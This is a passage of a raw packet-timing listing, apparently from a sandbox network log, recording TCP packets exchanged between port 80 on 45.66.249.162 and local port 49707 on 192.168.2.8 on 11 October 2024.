                                                                                                                                                              Oct 11, 2024 22:32:38.467153072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467173100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467178106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467186928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467206955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467209101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467227936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467237949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467245102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467262983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467272043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467277050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467293024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467300892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467313051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467329979 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467333078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467351913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467360973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467360973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467391968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467396021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467413902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467427969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467437983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467447042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467458010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467473984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467483044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467499971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467502117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467520952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467523098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467540026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467544079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467564106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467571974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467581034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467583895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467603922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467603922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467617989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467633009 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467634916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467654943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467669010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467674971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467691898 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467700005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467706919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467721939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467735052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467751980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467752934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467778921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467782021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467796087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467814922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467819929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467828989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467835903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467858076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467866898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467869997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467885971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467904091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467914104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467917919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467932940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467951059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467957973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467966080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.467983961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.467988968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468005896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468012094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468027115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468041897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468049049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468056917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468081951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468094110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468111038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468141079 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468141079 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468166113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468183041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468199015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468205929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468215942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468233109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468234062 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468260050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468271017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468280077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468286991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468300104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468308926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468319893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468323946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468343019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468358994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468358994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468377113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468394995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468554974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468573093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468590021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468595982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468605995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468621016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468672991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468693018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468708992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468713045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468729973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468734026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468746901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468755007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468763113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468775034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468787909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468803883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468806028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468822002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468839884 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468849897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468851089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468869925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468885899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468887091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468902111 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468908072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468919992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468929052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.468940020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.468955040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469022036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469042063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469057083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469060898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469077110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469086885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469093084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469115019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469115973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469132900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469146013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469166994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469167948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469187021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469203949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469207048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469218016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469228983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469234943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469249010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469259024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469269991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.469273090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.469305038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617552042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617615938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617635012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617657900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617660999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617675066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617698908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617703915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617724895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617733002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617741108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617753029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617765903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617774963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617791891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617794037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617811918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617815971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617829084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617849112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617850065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617868900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617887020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617897987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617902040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617916107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617933035 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617938042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617944956 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617959023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617966890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617980003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.617988110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.617999077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618010044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618026018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618031025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618046999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618052959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618067026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618076086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618086100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618096113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618107080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618118048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618134022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618161917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618180990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618195057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618200064 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618216991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618221998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618233919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618242025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618246078 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618269920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618273020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618288040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618302107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618310928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618315935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618329048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618340969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618349075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618364096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618379116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618380070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618398905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618412018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618418932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618436098 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618437052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618451118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618460894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618468046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618483067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.618489981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.618513107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619303942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619318008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619343996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619362116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619379044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619380951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619414091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619414091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619436979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619446993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619457006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619467020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619477987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619484901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619505882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619508028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619528055 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619537115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619549036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619566917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619568110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619582891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619591951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619601011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619611979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619627953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619658947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619667053 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619678020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619694948 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619700909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619712114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619720936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619725943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619740963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619755983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619760990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619775057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619787931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619790077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619807959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619824886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619836092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619837999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619867086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619869947 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619885921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619894981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619905949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619915962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619924068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619940042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619950056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619961023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619971991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619976997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.619993925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.619999886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620012045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:38.620022058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:38.620034933 CEST804970745.66.249.162192.168.2.8
